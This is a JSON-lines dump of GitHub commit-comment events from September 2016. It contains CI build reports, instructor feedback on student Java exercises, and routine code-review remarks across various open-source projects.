{"id":"4571726734","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047284,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T01:28:41Z","updated_at":"2016-09-16T01:28:41Z","body":"ASIHPValidation (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2329 of 2330 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T01:28:41Z"}
{"id":"4571730297","type":"CommitCommentEvent","actor":{"login":"rolfing"},"repo":{"name":"rolfing/ScoreKeeper"},"payload":{"comment":{"id":19047293,"position":null,"line":null,"path":null,"commit_id":"9642b15253c43297118814c85a74411025a2bb2c","created_at":"2016-09-16T01:30:08Z","updated_at":"2016-09-16T01:30:08Z","body":"Changed texts for strings!! The string for free throw is not in uppercase so why does it appear in Uppercase on my button????"}},"created_at":"2016-09-16T01:30:08Z"}
{"id":"4571731014","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-Cwilson918"},"payload":{"comment":{"id":19047294,"position":1,"line":1,"path":"logs/MyAppLog.log","commit_id":"50341413610639c3c6c767ad8233ee12c4a1ba69","created_at":"2016-09-16T01:30:22Z","updated_at":"2016-09-16T01:30:22Z","body":"Correct!"}},"created_at":"2016-09-16T01:30:22Z"}
{"id":"4571731107","type":"CommitCommentEvent","actor":{"login":"fundon"},"repo":{"name":"trekjs/middleware"},"payload":{"comment":{"id":19047296,"position":null,"line":null,"path":null,"commit_id":"d8780976892a4a6412d9d4d74046d840fb657b0a","created_at":"2016-09-16T01:30:24Z","updated_at":"2016-09-16T01:30:24Z","body":"是的，iterator 版本真没有发挥迭代器的真髓，有种“为了迭代而迭代的感觉”；no-iterator 版本简洁清晰"}},"created_at":"2016-09-16T01:30:24Z"}
{"id":"4571734144","type":"CommitCommentEvent","actor":{"login":"whagi"},"repo":{"name":"whagi/hello-world"},"payload":{"comment":{"id":19047303,"position":19,"line":19,"path":"filename neue ogndoc","commit_id":"0ebedbf25e1661c4381dc547d91d2237e7991340","created_at":"2016-09-16T01:31:39Z","updated_at":"2016-09-16T01:31:39Z","body":"eingefügt"}},"created_at":"2016-09-16T01:31:39Z"}
{"id":"4571734732","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-Cwilson918"},"payload":{"comment":{"id":19047306,"position":23,"line":53,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"50341413610639c3c6c767ad8233ee12c4a1ba69","created_at":"2016-09-16T01:31:56Z","updated_at":"2016-09-16T01:31:56Z","body":"Remember try-with-resources? If you don't use try-with-resources then make sure to include a finally and close all resources."}},"created_at":"2016-09-16T01:31:56Z"}
{"id":"4571737599","type":"CommitCommentEvent","actor":{"login":"Hobo20"},"repo":{"name":"Hobo20/Hobo"},"payload":{"comment":{"id":19047313,"position":3,"line":1,"path":"README.md","commit_id":"5c4035554cfd3dc7816e4bf5097a83fa951ede83","created_at":"2016-09-16T01:33:12Z","updated_at":"2016-09-16T01:33:12Z","body":"Fap fap fap"}},"created_at":"2016-09-16T01:33:12Z"}
{"id":"4571737894","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047314,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-16T01:33:18Z","updated_at":"2016-09-16T01:33:18Z","body":"FixAgainCentroidForNonConvex (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2336 of 2337 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T01:33:18Z"}
{"id":"4571739035","type":"CommitCommentEvent","actor":{"login":"XS-Z"},"repo":{"name":"amsterdamharu/typescriptHorrors"},"payload":{"comment":{"id":19047319,"position":null,"line":null,"path":null,"commit_id":"d983885a3a229656e2684d0cb3ac45f5e011ab9a","created_at":"2016-09-16T01:33:48Z","updated_at":"2016-09-16T01:33:48Z","body":"what your `package.json` looks like"}},"created_at":"2016-09-16T01:33:48Z"}
{"id":"4571742629","type":"CommitCommentEvent","actor":{"login":"SiriusHsh"},"repo":{"name":"SiriusHsh/PAT"},"payload":{"comment":{"id":19047325,"position":null,"line":null,"path":null,"commit_id":"0dedd8121b8ce2a29772c42a36f42986e5f1a8cd","created_at":"2016-09-16T01:34:53Z","updated_at":"2016-09-16T01:34:53Z","body":"..."}},"created_at":"2016-09-16T01:34:53Z"}
{"id":"4571742752","type":"CommitCommentEvent","actor":{"login":"IRTHATDUDE"},"repo":{"name":"Next-On-Top/SpawnerVoteTokenUI"},"payload":{"comment":{"id":19047327,"position":null,"line":null,"path":null,"commit_id":"f36b3e7f51500a2a5a16d07bd55bedc63774d3b7","created_at":"2016-09-16T01:34:56Z","updated_at":"2016-09-16T01:34:56Z","body":"Lol"}},"created_at":"2016-09-16T01:34:56Z"}
{"id":"4571743085","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-Cwilson918"},"payload":{"comment":{"id":19047328,"position":62,"line":92,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"50341413610639c3c6c767ad8233ee12c4a1ba69","created_at":"2016-09-16T01:35:03Z","updated_at":"2016-09-16T01:35:03Z","body":"Good separation of functionality into methods."}},"created_at":"2016-09-16T01:35:03Z"}
{"id":"4571744173","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-Cwilson918"},"payload":{"comment":{"id":19047332,"position":39,"line":65,"path":"src/test/java/edu/madisoncollege/entjava/ListTest.java","commit_id":"50341413610639c3c6c767ad8233ee12c4a1ba69","created_at":"2016-09-16T01:35:31Z","updated_at":"2016-09-16T01:35:31Z","body":"Good work testing here!"}},"created_at":"2016-09-16T01:35:31Z"}
{"id":"4571744229","type":"CommitCommentEvent","actor":{"login":"IRTHATDUDE"},"repo":{"name":"Next-On-Top/SpawnerVoteTokenUI"},"payload":{"comment":{"id":19047333,"position":79,"line":0,"path":"src/com/kyloka/voteTokenUI/references/itemsGUI.java","commit_id":"f36b3e7f51500a2a5a16d07bd55bedc63774d3b7","created_at":"2016-09-16T01:35:32Z","updated_at":"2016-09-16T01:35:32Z","body":"Nice"}},"created_at":"2016-09-16T01:35:32Z"}
{"id":"4571745193","type":"CommitCommentEvent","actor":{"login":"XS-Z"},"repo":{"name":"amsterdamharu/typescriptHorrors"},"payload":{"comment":{"id":19047336,"position":null,"line":null,"path":null,"commit_id":"d983885a3a229656e2684d0cb3ac45f5e011ab9a","created_at":"2016-09-16T01:35:57Z","updated_at":"2016-09-16T01:35:57Z","body":"BW, [Typescript 2 is coming out](https://blogs.msdn.microsoft.com/typescript/2016/08/30/announcing-typescript-2-0-rc/). 😄 "}},"created_at":"2016-09-16T01:35:57Z"}
{"id":"4571746843","type":"CommitCommentEvent","actor":{"login":"offl"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19047340,"position":null,"line":null,"path":null,"commit_id":"cd6866c1556ac05f0a24138093dd831e751caa75","created_at":"2016-09-16T01:36:38Z","updated_at":"2016-09-16T01:36:38Z","body":"[Why?](http://www.wowhead.com/quest=1466/reagents-for-reclaimers-inc#comments)"}},"created_at":"2016-09-16T01:36:38Z"}
{"id":"4571747070","type":"CommitCommentEvent","actor":{"login":"nolanlawson"},"repo":{"name":"healthonnet/hon-lucene-synonyms"},"payload":{"comment":{"id":19047342,"position":null,"line":null,"path":null,"commit_id":"c87fb8ced0abc9e19381a4843c964cf8473e8912","created_at":"2016-09-16T01:36:44Z","updated_at":"2016-09-16T01:36:44Z","body":"I no longer work there; I don't know."}},"created_at":"2016-09-16T01:36:44Z"}
{"id":"4571747828","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-Cwilson918"},"payload":{"comment":{"id":19047346,"position":13,"line":13,"path":"src/test/java/edu/madisoncollege/entjava/SantaInAnElevatorTest.java","commit_id":"50341413610639c3c6c767ad8233ee12c4a1ba69","created_at":"2016-09-16T01:37:03Z","updated_at":"2016-09-16T01:37:03Z","body":"Would have been nice to see a few more tests here. Your goal should be to have **at least** one test method for each method in your Santa class."}},"created_at":"2016-09-16T01:37:03Z"}
{"id":"4571749550","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047356,"position":null,"line":null,"path":null,"commit_id":"301d7794a2b460584a74cb8d2152af03bb2b6eca","created_at":"2016-09-16T01:37:46Z","updated_at":"2016-09-16T01:37:46Z","body":"Related to: backdrop/backdrop-issues#248 "}},"created_at":"2016-09-16T01:37:46Z"}
{"id":"4571751733","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"huffmanjh/sfdat26-huffman"},"payload":{"comment":{"id":19047363,"position":null,"line":null,"path":null,"commit_id":"ad73f596799b553b71a83f18a1e194117117408f","created_at":"2016-09-16T01:38:42Z","updated_at":"2016-09-16T01:38:42Z","body":"Businesses\r\n\r\n- # 4 - Love how you solved this. You can also convert the date column to a series of datetime objects:\r\nFrom datetime import datetime\r\ninspections['month'] = inspections['date'].apply(lambda x: pd.to_datetime(str(x), format='%Y%m%d')).apply(lambda x: x.month)\r\n- # 6 - You can use this to find distribution of risk categories for new ownership: restaurant_scores[restaurant_scores.type == 'New Ownership'].risk_category.value_counts(normalize=True)\r\n- # 9 - Lots of different ways you could approach. Let me know if you want to brainstorm in office hours :)\r\n\r\nMorbid\r\n\r\n- # 7 - to print a percentage, you can use \"{0:.2f}%\".format(b*100)\r\n- #11 - You can make your histograms more readable by adding figsize = (12,8)\r\n\r\nLess Morbid\r\n\r\n- # 4 - Add x=’Major’ after kind=’bar’: majors[['Major','Median']].sort_index(by='Median', ascending = False).head(10).plot(kind='bar',x='Major', title='Top 10 Highest Paying Majors')\r\nplt.xlabel('Major')\r\nplt.ylabel('Median Pay')\r\n- # 8 - You don’t need groupby for a histogram. This might be a little easier to read: majors.medianx.hist(by=majors.major_category, sharex=True, sharey=True, figsize=(10,12))"}},"created_at":"2016-09-16T01:38:42Z"}
{"id":"4571752157","type":"CommitCommentEvent","actor":{"login":"sprakashb"},"repo":{"name":"sprakashb/Si5351VFO-BFO-with-Keypad"},"payload":{"comment":{"id":19047366,"position":null,"line":null,"path":null,"commit_id":"66f4da9af75fc42a7f0454e0f5e796353ce496cb","created_at":"2016-09-16T01:38:52Z","updated_at":"2016-09-16T01:38:52Z","body":"PCB pattern"}},"created_at":"2016-09-16T01:38:52Z"}
{"id":"4571762510","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19047397,"position":null,"line":null,"path":null,"commit_id":"cd6866c1556ac05f0a24138093dd831e751caa75","created_at":"2016-09-16T01:43:05Z","updated_at":"2016-09-16T01:43:05Z","body":"Because it's hard to read.\r\nhttp://www.wowhead.com/quest=1466/reagents-for-reclaimers-inc#comments:id=136201"}},"created_at":"2016-09-16T01:43:05Z"}
{"id":"4571770715","type":"CommitCommentEvent","actor":{"login":"earlyster"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19047422,"position":19,"line":19,"path":"packages/ng1-bower/webpack.config.js","commit_id":"3a1160d30cad275af9eb5c9e5142714b974123e6","created_at":"2016-09-16T01:46:31Z","updated_at":"2016-09-16T01:46:31Z","body":"Can you do this with multiple ng-apps on one page?\r\nI am running into issues with multiple ng apps on same page. Where the injector is from the last app and templateCache and $rootScope is not the one I want."}},"created_at":"2016-09-16T01:46:31Z"}
{"id":"4571771293","type":"CommitCommentEvent","actor":{"login":"MAmelia"},"repo":{"name":"tec-webII-2n11/rafaelModa-mariana"},"payload":{"comment":{"id":19047424,"position":null,"line":null,"path":null,"commit_id":"fc8c71cf0dc603c0c9f88fd3070fe361617c0e60","created_at":"2016-09-16T01:46:47Z","updated_at":"2016-09-16T01:46:47Z","body":"Faltou enviar o arquivo \"fluxograma.pdf"}},"created_at":"2016-09-16T01:46:47Z"}
{"id":"4571775727","type":"CommitCommentEvent","actor":{"login":"yhzhan"},"repo":{"name":"stuy-softdev/workshop"},"payload":{"comment":{"id":19047441,"position":null,"line":null,"path":null,"commit_id":"8ed5dcc4af7fa723e920157e22a7e0de088722a3","created_at":"2016-09-16T01:48:42Z","updated_at":"2016-09-16T01:48:42Z","body":"This is the wrong URL. The correct URL is https://github.com/yhzhan/project1.git"}},"created_at":"2016-09-16T01:48:42Z"}
{"id":"4571777870","type":"CommitCommentEvent","actor":{"login":"mike-tinyco"},"repo":{"name":"brooklynpacket/cocos2d-x"},"payload":{"comment":{"id":19047449,"position":23,"line":23,"path":"cocos/platform/ios/BPCHelper-ios.mm","commit_id":"8788dd3d19e8eec8e95712c7c1c6960a153b6b1e","created_at":"2016-09-16T01:49:39Z","updated_at":"2016-09-16T01:49:39Z","body":"Dunno if this is applicable but should we be that system version or the foundation framework number: `NSFoundationVersionNumber`?"}},"created_at":"2016-09-16T01:49:39Z"}
{"id":"4571779735","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"baxterthehacker/public-repo"},"payload":{"comment":{"id":19047453,"position":null,"line":null,"path":null,"commit_id":"0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c","created_at":"2016-09-16T01:50:14Z","updated_at":"2016-09-16T01:50:14Z","body":"test"}},"created_at":"2016-09-16T01:50:14Z"}
{"id":"4571788495","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047472,"position":null,"line":null,"path":null,"commit_id":"3a3cae7c718d6c113058bc24ebdfcdeb5cffc9e1","created_at":"2016-09-16T01:53:10Z","updated_at":"2016-09-16T01:53:10Z","body":"Related to: backdrop/backdrop-issues#2194 "}},"created_at":"2016-09-16T01:53:10Z"}
{"id":"4571791642","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047480,"position":null,"line":null,"path":null,"commit_id":"50606722091f844d3652f40d6af0b286ccd33c40","created_at":"2016-09-16T01:54:01Z","updated_at":"2016-09-16T01:54:01Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-16T01:54:01Z"}
{"id":"4571793505","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047484,"position":null,"line":null,"path":null,"commit_id":"29941a3746203af67497b4ccbd2c2d66b8dc3d0e","created_at":"2016-09-16T01:54:34Z","updated_at":"2016-09-16T01:54:34Z","body":"Related to: backdrop/backdrop-issues#2183 "}},"created_at":"2016-09-16T01:54:34Z"}
{"id":"4571794596","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047488,"position":null,"line":null,"path":null,"commit_id":"50606722091f844d3652f40d6af0b286ccd33c40","created_at":"2016-09-16T01:54:58Z","updated_at":"2016-09-16T01:54:58Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T01:54:58Z"}
{"id":"4571797596","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047500,"position":null,"line":null,"path":null,"commit_id":"91d2b0d13a51d97d44f7d17cbc3f49f03030b71d","created_at":"2016-09-16T01:56:16Z","updated_at":"2016-09-16T01:56:16Z","body":"Related to: backdrop/backdrop-issues#2182 "}},"created_at":"2016-09-16T01:56:16Z"}
{"id":"4571803097","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jpauley16"},"payload":{"comment":{"id":19047513,"position":1,"line":1,"path":"logs/MyAppLog.log","commit_id":"b5d720e8c3a0fa70e5f22c90b1b930f924a3edbb","created_at":"2016-09-16T01:58:32Z","updated_at":"2016-09-16T01:58:32Z","body":"correct!\r\n"}},"created_at":"2016-09-16T01:58:32Z"}
{"id":"4571804722","type":"CommitCommentEvent","actor":{"login":"offl"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19047519,"position":null,"line":null,"path":null,"commit_id":"cd6866c1556ac05f0a24138093dd831e751caa75","created_at":"2016-09-16T01:59:10Z","updated_at":"2016-09-16T01:59:10Z","body":"[This](http://www.wowhead.com/quest=1466/reagents-for-reclaimers-inc#comments:id=1001974) looks differently. According to this logic, all items from this chain should always drop(now 80%). But not, look at [comment to another quest](http://www.wowhead.com/quest=1458/reagents-for-reclaimers-inc#comments:id=177907)."}},"created_at":"2016-09-16T01:59:10Z"}
{"id":"4571805586","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jpauley16"},"payload":{"comment":{"id":19047520,"position":28,"line":57,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"b5d720e8c3a0fa70e5f22c90b1b930f924a3edbb","created_at":"2016-09-16T01:59:34Z","updated_at":"2016-09-16T01:59:34Z","body":"Remember try with resources? If you don't use it, then you need to be sure to close the file in a finally.   You also do not need to use getResource - refer back to Adv java Project 1 for how to read a file."}},"created_at":"2016-09-16T01:59:34Z"}
{"id":"4573170984","type":"CommitCommentEvent","actor":{"login":"mbarmawi"},"repo":{"name":"mbarmawi/CodeBase"},"payload":{"comment":{"id":19051744,"position":null,"line":null,"path":null,"commit_id":"06921de78c69102b20f8bd0fce1841c31ec3fd94","created_at":"2016-09-16T10:00:05Z","updated_at":"2016-09-16T10:00:05Z","body":"Work with interface implicit,explicit"}},"created_at":"2016-09-16T10:00:05Z"}
{"id":"4573174695","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051748,"position":68,"line":68,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:00:50Z","updated_at":"2016-09-16T10:00:50Z","body":"don't you want to sent the error to the client?"}},"created_at":"2016-09-16T10:00:50Z"}
{"id":"4573177560","type":"CommitCommentEvent","actor":{"login":"nlyan"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":19051753,"position":7,"line":367,"path":"src/lib/client/Client.cpp","commit_id":"59d2c790d39e31ab04ebb1f8862ffd4201982743","created_at":"2016-09-16T10:01:27Z","updated_at":"2016-09-16T10:01:27Z","body":"What warning does this fix? \r\n\r\nUsually cbegin/cend is what you want"}},"created_at":"2016-09-16T10:01:27Z"}
{"id":"4573178624","type":"CommitCommentEvent","actor":{"login":"koheishingai-opst"},"repo":{"name":"koheishingai-opst/isucon3-python"},"payload":{"comment":{"id":19051758,"position":null,"line":null,"path":null,"commit_id":"883aa30431d3c2737aedf64619ccdd3b0f410a29","created_at":"2016-09-16T10:01:41Z","updated_at":"2016-09-16T10:01:41Z","body":"### 修正前:\r\n```sh\r\n2016-09-16T10:00:11 [29657] [INFO] starting benchmark: concurrency: 6, time: 60\r\n2016-09-16T10:01:15 [29657] [INFO] done benchmark: score 1875.35581579662, elapsed 63.013 sec = 29.762 / sec\r\n```\r\n### 修正後:"}},"created_at":"2016-09-16T10:01:41Z"}
{"id":"4573179111","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051760,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:01:49Z","updated_at":"2016-09-16T10:01:49Z","body":"In general this looks very good.\r\n\r\nAdding a number to slant seems fine, but is there really a continuous, interpolable variation between upright and italic forms? It seems to me that this is more of a design choice boolean (so the existing keyword is sufficient). Happy to be convinced otherwise with examples, though.\r\n\r\nI wonder whether the font-weight and font-style (ie slant) descriptors in @font-face should take ranges, because otherwise they do not indicate the ranges that a font supports (and the font won't be downloaded to check)."}},"created_at":"2016-09-16T10:01:49Z"}
{"id":"4573181577","type":"CommitCommentEvent","actor":{"login":"techAPJ"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19051764,"position":null,"line":null,"path":null,"commit_id":"0bf7519a8ac5a21b485bdcae7529ff1c26fcf442","created_at":"2016-09-16T10:02:23Z","updated_at":"2016-09-16T10:02:23Z","body":"👍 👍 "}},"created_at":"2016-09-16T10:02:23Z"}
{"id":"4573182139","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051772,"position":73,"line":73,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:02:32Z","updated_at":"2016-09-16T10:02:32Z","body":"I would add more details here. Which auth? What to do? Users should have a chance to understand errors output"}},"created_at":"2016-09-16T10:02:32Z"}
{"id":"4573184914","type":"CommitCommentEvent","actor":{"login":"samueltardieu"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19051808,"position":null,"line":null,"path":null,"commit_id":"61fbe4e3ccff5becc20c505a45aaf46a5d19dc82","created_at":"2016-09-16T10:03:10Z","updated_at":"2016-09-16T10:03:10Z","body":"We might do that as soon as we are using SDK 23, which has a (support-compatible) way of checking this. I'm not sure we can do it before in a way compatible with SDK 23."}},"created_at":"2016-09-16T10:03:10Z"}
{"id":"4573186726","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051809,"position":617,"line":5068,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:03:35Z","updated_at":"2016-09-16T10:03:35Z","body":"Nope nope nope. OpenType variations are the source of truth here."}},"created_at":"2016-09-16T10:03:35Z"}
{"id":"4573186736","type":"CommitCommentEvent","actor":{"login":"Guts"},"repo":{"name":"isogeo/isogeo-plugin-qgis"},"payload":{"comment":{"id":19051810,"position":19,"line":19,"path":"modules/tools.py","commit_id":"3b940e7e0359d63b0ba70929494f718c201a1199","created_at":"2016-09-16T10:03:35Z","updated_at":"2016-09-16T10:03:35Z","body":"Could be quicker:\r\n```python\r\nfrom math import ceil\r\nint(ceil(nb_fiches / 15)) + 1\r\n```\r\n\r\n\r\nTest on different cases."}},"created_at":"2016-09-16T10:03:35Z"}
{"id":"4573187688","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19051812,"position":null,"line":null,"path":null,"commit_id":"2e1abdab64efb24f0525f69d21f716753805504a","created_at":"2016-09-16T10:03:48Z","updated_at":"2016-09-16T10:03:48Z","body":"OpenStreetMap tracing unlocked! 👍 "}},"created_at":"2016-09-16T10:03:48Z"}
{"id":"4573190655","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19051815,"position":6,"line":481,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T10:04:30Z","updated_at":"2016-09-16T10:04:30Z","body":"so the ignore added my Marius was not correct?"}},"created_at":"2016-09-16T10:04:30Z"}
{"id":"4573192213","type":"CommitCommentEvent","actor":{"login":"kaspermarstal"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19051817,"position":null,"line":null,"path":null,"commit_id":"7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7","created_at":"2016-09-16T10:04:48Z","updated_at":"2016-09-16T10:04:48Z","body":"The error came up when building the command line interface as an external project. That is, if a user imports the SuperElastix use-file and tries to compile the project without having C++11 enabled, the error will be triggered. We cannot control what is in the user's repository. Of course I agree that we should check for C++ capability explicitly in CMake as well.\r\n\r\nStyle-wise I also prefer the space between brackets. What do you think?"}},"created_at":"2016-09-16T10:04:48Z"}
{"id":"4573192356","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051818,"position":91,"line":91,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:04:50Z","updated_at":"2016-09-16T10:04:50Z","body":"they are all one liners:\r\n\r\n```js\r\nrequest\r\n  .on('data', chunk => proxy.write(chunk, 'binary'))\r\n  .on('end', () => proxy.end());\r\n```"}},"created_at":"2016-09-16T10:04:50Z"}
{"id":"4573194445","type":"CommitCommentEvent","actor":{"login":"micafer"},"repo":{"name":"grycap/clues"},"payload":{"comment":{"id":19051823,"position":50,"line":304,"path":"cluesplugins/im.py","commit_id":"194637e885ef4256ebf2fb64887bd85f7c1f0414","created_at":"2016-09-16T10:05:15Z","updated_at":"2016-09-16T10:05:15Z","body":"If the vm is in the _stopped_vms is because it has been stopped so ec3_reuse_nodes must be allways True. "}},"created_at":"2016-09-16T10:05:15Z"}
{"id":"4573194826","type":"CommitCommentEvent","actor":{"login":"Guts"},"repo":{"name":"isogeo/isogeo-plugin-qgis"},"payload":{"comment":{"id":19051826,"position":35,"line":35,"path":"modules/tools.py","commit_id":"3b940e7e0359d63b0ba70929494f718c201a1199","created_at":"2016-09-16T10:05:19Z","updated_at":"2016-09-16T10:05:19Z","body":"According to [the doc](https://docs.python.org/2/library/webbrowser.html#webbrowser.open), it should be `2` no?\r\nOr use [open_new_tab](https://docs.python.org/2/library/webbrowser.html#webbrowser.open_new_tab) directly?"}},"created_at":"2016-09-16T10:05:19Z"}
{"id":"4573197602","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051831,"position":130,"line":762,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:05:53Z","updated_at":"2016-09-16T10:05:53Z","body":"The OT spec says that these should be percentages of \"normal\". So normal should be \"100\" and I should do some research to find reasonable values for the other ones."}},"created_at":"2016-09-16T10:05:53Z"}
{"id":"4573205911","type":"CommitCommentEvent","actor":{"login":"tolyo"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19051850,"position":6,"line":24,"path":"brunch-config.js","commit_id":"fc040a22d5d9330437999eea55c4e34188072610","created_at":"2016-09-16T10:07:32Z","updated_at":"2016-09-16T10:07:32Z","body":"@franbenz @soumak77 Template updated. Please try latest version."}},"created_at":"2016-09-16T10:07:32Z"}
